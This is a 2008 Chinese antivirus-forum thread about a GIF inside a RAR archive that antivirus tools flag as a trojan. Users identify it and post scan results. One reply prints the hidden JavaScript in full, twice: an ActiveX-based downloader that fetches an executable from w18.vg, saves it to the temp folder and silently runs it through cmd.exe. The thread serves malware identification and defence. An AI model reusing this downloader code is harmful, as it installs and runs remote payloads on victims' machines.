查看: 3423|回复: 19
收起左侧

[病毒样本] 好奇怪啊,这个图片卡巴报木马!!!

[复制链接]
gtljixie
发表于 2008-1-14 23:02:45 | 显示全部楼层 |阅读模式
压缩包的图片卡巴报毒!!!应该是改后缀了!!!大伙看看!!!!!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
zzh161
发表于 2008-1-14 23:06:11 | 显示全部楼层
木马,指向http://w18.vg/s.exe
sam.to
发表于 2008-1-14 23:06:11 | 显示全部楼层
有什麼问题?
gtljixie
 楼主| 发表于 2008-1-14 23:08:08 | 显示全部楼层
哦,谢谢斑竹
jimmyleo
发表于 2008-1-14 23:08:35 | 显示全部楼层
并非有效图片
  1. <script>
  2. try
  3. {
  4. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  5. var Bf=document.createElement("object");
  6. Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  7. var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
  8. var AS=Bf.CreateObject("Adodb.Stream","");
  9. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  10. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  11. AS.type=1;
  12. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  13. Kx.open("GET", 'http://w18.vg/s.exe',0);
  14. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  15. Kx.send();
  16. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  17. Ns1='~Temp'+Math.round(Math.random()*9999)+'.tmp';
  18. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  19. var cF=Bf.CreateObject("Scripting.FileSystemObject","");
  20. var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
  21. AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
  22. ok1=cF.BuildPath(NsTmp+'\\system32','cmd.exe');
  23. q["ShellExecute"](ok1,' /c '+Ns1,"","open",0);
  24. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  25. }
  26. catch(xxfqeadsf) { xxfqeadsf=1; }
  27. </script>

  28. try
  29. {
  30. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  31. var Bf=document.createElement("object");
  32. Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  33. var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
  34. var AS=Bf.CreateObject("Adodb.Stream","");
  35. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  36. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  37. AS.type=1;
  38. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  39. Kx.open("GET", 'http://w18.vg/s.exe',0);
  40. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  41. Kx.send();
  42. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  43. Ns1='~Temp'+Math.round(Math.random()*9999)+'.tmp';
  44. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  45. var cF=Bf.CreateObject("Scripting.FileSystemObject","");
  46. var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
  47. AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
  48. ok1=cF.BuildPath(NsTmp+'\\system32','cmd.exe');
  49. q["ShellExecute"](ok1,' /c '+Ns1,"","open",0);
  50. b5fsdafsawfsf='xxxxxxxxxxxxxxxxxfdsa';
  51. }
  52. catch(xxfqeadsf) { xxfqeadsf=1; }
复制代码

下载http://w18.vg/s.exe
leonfg
发表于 2008-1-14 23:30:34 | 显示全部楼层
网址w18.vg,ZA block
mofunzone
发表于 2008-1-14 23:44:25 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\opr000rz.rar'
C:\Documents and Settings\Administrator\My Documents\
  opr000rz.rar
    [0] Archive type: RAR
    --> opr000rz.gif
        [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Small.EH
        [WARNING]   Infected files in archives cannot be repaired!
      [INFO]      The file was deleted!
dianziliqi
头像被屏蔽
发表于 2008-1-14 23:47:58 | 显示全部楼层
牛啊
学习了  谢谢 版主解释
jick117
发表于 2008-1-14 23:51:15 | 显示全部楼层
检测到病毒: Trojan-Downloader.JS.Psyme.xz
文件: opr000rz.rar
目录: C:\Documents and Settings\Administrator\桌面
进程: 7zFM.exe
sdhlong
发表于 2008-1-15 00:51:42 | 显示全部楼层
江民报毒!
如图:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-13 03:49 , Processed in 0.126410 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表